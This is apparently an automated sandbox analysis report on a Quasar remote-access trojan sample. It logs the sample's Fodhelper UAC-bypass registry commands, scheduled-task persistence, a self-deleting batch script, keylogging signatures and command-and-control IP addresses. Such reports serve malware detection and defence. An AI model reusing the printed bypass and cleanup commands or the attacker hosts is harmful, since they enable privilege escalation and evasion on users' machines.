                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreak
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeQueries volume information: C:\Users\user\Desktop\Dd5DwDCHJD.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: Dd5DwDCHJD.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dd5DwDCHJD.exe PID: 7324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7452, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Dd5DwDCHJD.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dd5DwDCHJD.exe PID: 7324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7452, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts12
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      11
                      Process Injection
                      1
                      Masquerading
                      11
                      Input Capture
                      1
                      Query Registry
                      Remote Services11
                      Input Capture
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scripting
                      1
                      Scheduled Task/Job
                      1
                      Modify Registry
                      LSASS Memory11
                      Security Software Discovery
                      Remote Desktop Protocol1
                      Archive Collected Data
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Disable or Modify Tools
                      Security Account Manager31
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive3
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading
                      31
                      Virtualization/Sandbox Evasion
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Process Injection
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeylogging12
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Hidden Files and Directories
                      Cached Domain Credentials13
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Abuse Elevation Control Mechanism
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Obfuscated Files or Information
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582962 Sample: Dd5DwDCHJD.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 11 other signatures 2->63 8 Dd5DwDCHJD.exe 14 10 2->8         started        13 Client.exe 2 2->13         started        process3 dnsIp4 53 45.83.244.141, 49730, 80 GBTCLOUDUS Germany 8->53 47 C:\Users\user\AppData\Roaming\...\Client.exe, PE32 8->47 dropped 49 C:\Users\user\AppData\...\UACBypass1.bat, ASCII 8->49 dropped 51 C:\Users\user\AppData\...\Dd5DwDCHJD.exe.log, CSV 8->51 dropped 65 Uses schtasks.exe or at.exe to add and modify task schedules 8->65 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->67 15 cmd.exe 1 8->15         started        18 cmd.exe 8->18         started        20 cmd.exe 8->20         started        22 schtasks.exe 1 8->22         started        55 193.31.28.181, 4004, 49731, 49733 QUICKPACKETUS United Kingdom 13->55 69 Antivirus detection for dropped file 13->69 71 Multi AV Scanner detection for dropped file 13->71 73 Machine Learning detection for dropped file 13->73 75 Installs a global keyboard hook 13->75 24 schtasks.exe 13->24         started        file5 signatures6 process7 signatures8 79 Uses cmd line tools excessively to alter registry or file data 15->79 26 reg.exe 1 1 15->26         started        29 reg.exe 1 1 15->29         started        39 5 other processes 15->39 31 reg.exe 18->31         started        33 reg.exe 18->33         started        41 6 other processes 18->41 43 2 other processes 20->43 35 conhost.exe 22->35         started        37 conhost.exe 24->37         started        process9 signatures10 77 UAC bypass detected (Fodhelper) 26->77 45 Client.exe 3 39->45         started        process11

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Dd5DwDCHJD.exe74%ReversingLabsByteCode-MSIL.Backdoor.Quasar
                      Dd5DwDCHJD.exe74%VirustotalBrowse
                      Dd5DwDCHJD.exe100%AviraHEUR/AGEN.1307453
                      Dd5DwDCHJD.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\$77-cmd\Client.exe100%AviraHEUR/AGEN.1307453
                      C:\Users\user\AppData\Roaming\$77-cmd\Client.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\$77-cmd\Client.exe74%ReversingLabsByteCode-MSIL.Backdoor.Quasar
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://45.83.244.141/Files/Install.exe0%Avira URL Cloudsafe
                      http://45.83.244.1410%Avira URL Cloudsafe
                      http://crl.microsoft.0%Avira URL Cloudsafe
                      193.31.28.1810%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        217.20.57.35
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://45.83.244.141/Files/Install.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          193.31.28.181true
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/Dd5DwDCHJD.exe, Client.exe.0.drfalse
                            high
                            https://stackoverflow.com/q/14436606/23354Dd5DwDCHJD.exe, Client.exe.0.drfalse
                              high
                              https://stackoverflow.com/q/2152978/23354sCannotDd5DwDCHJD.exe, Client.exe.0.drfalse
                                high
                                https://ipwho.is/Dd5DwDCHJD.exe, Client.exe.0.drfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDd5DwDCHJD.exe, 00000000.00000002.1729416327.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4123066186.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;Dd5DwDCHJD.exe, Client.exe.0.drfalse
                                      high
                                      http://crl.microsoft.Client.exe, 00000003.00000002.4131360857.000000001CC79000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://45.83.244.141Dd5DwDCHJD.exe, 00000000.00000002.1729416327.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Dd5DwDCHJD.exe, 00000000.00000002.1729416327.000000000368C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      193.31.28.181
                                      unknownUnited Kingdom
                                      46261QUICKPACKETUStrue
                                      45.83.244.141
                                      unknownGermany
                                      395800GBTCLOUDUSfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582962
                                      Start date and time:2025-01-01 05:56:10 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 39s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:31
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Dd5DwDCHJD.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:6d6c9c719e2f757442374af378c343a7.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@50/11@0/2
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 28
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 199.232.210.172, 199.232.214.172, 217.20.57.35, 20.109.210.53, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                      • Execution Graph export aborted for target Client.exe, PID 7616 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      TimeTypeDescription
                                      04:57:04Task SchedulerRun new task: $77-cmd path: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                      23:57:07API Interceptor1x Sleep call for process: Dd5DwDCHJD.exe modified
                                      23:57:09API Interceptor14224426x Sleep call for process: Client.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      45.83.244.141YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                        • 217.20.57.43
                                        Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                        • 217.20.57.35
                                        PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                        • 217.20.57.37
                                        EiO4tqZ3o4.exeGet hashmaliciousAsyncRATBrowse
                                        • 217.20.58.100
                                        wce.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.58.98
                                        nXNMsYXFFc.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.58.100
                                        5RaYXoKFn9.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                        • 217.20.58.98
                                        msgde.exeGet hashmaliciousQuasarBrowse
                                        • 217.20.58.99
                                        atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                        • 217.20.58.100
                                        WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                        • 217.20.58.99
                                        bg.microsoft.map.fastly.netrename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                        • 199.232.210.172
                                        2VsJzzWTpA.exeGet hashmaliciousCobaltStrikeBrowse
                                        • 199.232.214.172
                                        2VsJzzWTpA.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                        • 199.232.210.172
                                        O782uurN5d.exeGet hashmaliciousDCRatBrowse
                                        • 199.232.210.172
                                        bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                        • 199.232.210.172
                                        46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                        • 199.232.210.172
                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                        • 199.232.214.172
                                        GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        Qu3ped8inH.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        QUICKPACKETUS3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                                        • 185.230.138.58
                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 198.22.235.170
                                        la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                        • 198.22.243.54
                                        la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                        • 172.98.171.129
                                        surfex.exeGet hashmaliciousRedLineBrowse
                                        • 185.218.125.157
                                        c2.htaGet hashmaliciousXWormBrowse
                                        • 193.26.115.21
                                        armv5l.elfGet hashmaliciousMiraiBrowse
                                        • 23.133.3.186
                                        elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 23.133.3.168
                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                        • 185.225.234.108
                                        c2.htaGet hashmaliciousXWormBrowse
                                        • 193.26.115.21
                                        GBTCLOUDUSYJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                        • 45.83.244.141
                                        nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                        • 194.31.197.248
                                        58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                        • 45.94.31.128
                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 5.183.206.192
                                        akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                        • 154.37.70.165
                                        x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 45.11.15.123
                                        botx.x86.elfGet hashmaliciousMiraiBrowse
                                        • 154.37.105.101
                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 2.58.149.182
                                        sparc.elfGet hashmaliciousOkiruBrowse
                                        • 154.37.39.10
                                        VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                        • 212.87.215.19
                                        No context
                                        No context
                                        Process:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                        Category:dropped
                                        Size (bytes):71954
                                        Entropy (8bit):7.996617769952133
                                        Encrypted:true
                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                        Malicious:false
                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                        Process:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):328
                                        Entropy (8bit):3.233705726912275
                                        Encrypted:false
                                        SSDEEP:6:kKf++i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XBdDImsLNkPlE99SNxAhUe/3
                                        MD5:168C641105D970A3E10B699BE7980AC5
                                        SHA1:31D63E81F8DCEED5717CF7C1AB463C86F2611A7C
                                        SHA-256:783A0AE29F6469B866FD1C2B3CCA6586B4FC17A5BBAC4C2676A829F7105B4FEA
                                        SHA-512:561C29B4E029A4FB49677F957750A9385695387A90004E5B6E659230968531669A55617DC9D49103ECD316E8708DB39EA82B342DE96E909A61AC4428D6A18304
                                        Malicious:false
                                        Preview:p...... ........h.+,s...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                        Process:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1281
                                        Entropy (8bit):5.370111951859942
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                        MD5:12C61586CD59AA6F2A21DF30501F71BD
                                        SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                        SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                        SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                        Process:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1281
                                        Entropy (8bit):5.370111951859942
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                        MD5:12C61586CD59AA6F2A21DF30501F71BD
                                        SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                        SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                        SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                        Process:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):3268096
                                        Entropy (8bit):6.078613024479684
                                        Encrypted:false
                                        SSDEEP:49152:HwElUPhZwv68DkG17WlqTz5oqM/p7vGJfAHdkTHHB72eh2NT:HwYUPhZwv68DkG17WlqTzeqM/p6t
                                        MD5:6D6C9C719E2F757442374AF378C343A7
                                        SHA1:A58A2AA6DAE2DBDF64472614985CAC2ADCE4EDDB
                                        SHA-256:444C97F6DB0626069965D9E4DDB4BF315326954C51B123B3DC7D64084E7FB646
                                        SHA-512:A3EF795E64B1D43CA300DA97ABC7D211E5987064C1C7CAFA7A1DADCD1CB35902FB230F5B8E9A008CED4BC1D33573403BAD2D99A4CCCA9B6B749355110EB10210
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Joe Security
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Florian Roth
                                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: ditekSHen
                                        • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: ditekshen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 74%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... hg..................1...........1.. ........@.. .......................@2...........@...................................1.S.....2.<.................... 2...................................................... ............... ..H............text...$.1.. ....1................. ..`.rsrc...<.....2.......1.............@..@.reloc....... 2.......1.............@..B..................1.....H........................m..p............................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(....*....0..8.......(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........--..........00.......0..@........o....,7(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........-5..........08......f~w...,.~....(....(....*.*v.(.....s....}.....s....}....*r..(......(.....(......(....*....0..L........{....r...po....
                                        Process:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):85
                                        Entropy (8bit):4.785213142628158
                                        Encrypted:false
                                        SSDEEP:3:2EKDDCMN2Rqw4ohesNt+WfWhBueAovn:0WK2MohesNwvjAovn
                                        MD5:5904F86D2AD73FFF59F5D75388703D11
                                        SHA1:E6B9C228BE16CDFACD28A96B96837FB821316B7D
                                        SHA-256:746CC688BB1FCFED20E162501033ED0F2C8AF30498AC213771AD6EFE3D40DFBF
                                        SHA-512:2510B7F01D7899331FB5179CF59129B364CD6B7163585BFEB8A439742AFE175F3D06AEBB3DFC4360699F4A1143AF6E774CD3B4A1D76FC2CEBE1A17F2B9AB0650
                                        Malicious:false
                                        Preview:..@echo off..timeout /t 5 /nobreak > nul..del C:\Users\user\Desktop\Dd5DwDCHJD.exe..
                                        Process:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):368
                                        Entropy (8bit):4.954112017079806
                                        Encrypted:false
